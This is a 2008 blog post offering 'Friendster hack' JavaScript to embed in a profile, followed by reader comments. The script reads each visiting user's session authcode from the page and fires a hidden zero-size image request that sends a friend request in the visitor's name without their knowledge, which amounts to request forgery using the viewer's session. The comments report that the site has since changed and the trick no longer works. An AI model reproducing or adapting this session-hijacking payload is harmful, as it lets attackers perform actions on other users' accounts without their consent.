Home > Friendster, Javascript > Auto Add Friends Using (Javascript) Friendster Hacks

Auto Add Friends Using (Javascript) Friendster Hacks


Advertisement



September 27th, 2008 Admin Leave a comment Go to comments

This is a little trick using javascript inserted to your profile in about me or who i want to meet sections. This script will add another Friendster user become your friends when they view your profile and not your friends yet :)

Ok let’s go. For details how to insert and generate JS script to embed in profile, please view my past post about Boost Your Friends Using (Javascript) Friendster Hacks :) I assummed you already have file hosting account in Fileave or Ripway. Copy this code below into your notepad and rename into, example my-script.js or if you already have previous js file in file hosting account, just edit it and save :)

?View Code JAVASCRIPT
var afaimg = document.createElement('span');
afaimg.id = "addme";
document.getElementsByTagName('head')[0].appendChild(afaimg);
function afa() {
var eadd = "Your Email Address";
var k = document.getElementById("controlPanelButtons").innerHTML;
var a = k.slice(k.indexOf("authcode="));
var m = a.slice(9,39);
document.getElementById("addme").innerHTML = "<img src=\"http://www.friendster.com/addfriendrequest.php?authcode="+m+"&uid="+pageOwnerID+"&email="+eadd+"&firstname=&lastname=&friend=&submit=1\" width=\"0\" height=\"0\" />";
}
if (!attachOnLoadHandler(function() { afa();})) window.onload = function() { afa();};

Please change Your Email Address in line 5 with your real email address used in your Friendster account. Now everytime another Friendster user view your profile they’ll add into your friends list :D

Related posts:

  1. Boost Your Friends Using (Javascript)-Friendster Hacks
  2. Remove Friendster Ads With CSS Injection
  3. Hidden URL (Link) in Windows Status Bar with Javascript
  4. Write Friendster Comment More Than 1000 Chars with Text2Image!
  5. Free CB Plugin Simple Invitation (Invite Friends)
Categories: Friendster, Javascript Tags:
  1. March 23rd, 2009 at 15:16 | #1

    i follow the instructions well. but it seems like it didn’t work well. is the code good for CSS also.. even for a few adjustments? hekhek. just asking.. tenk yu. xD

    • Admin
      March 23rd, 2009 at 15:51 | #2

      Sorry ….

      FS has change their script again :(

      regards :D

  2. August 10th, 2009 at 06:24 | #3

    how can invite my friends at friendster?

  3. August 22nd, 2009 at 23:12 | #4

    friendster always change their scripttt……

Comment pages
1 2 90
  1. September 27th, 2008 at 23:13 | #1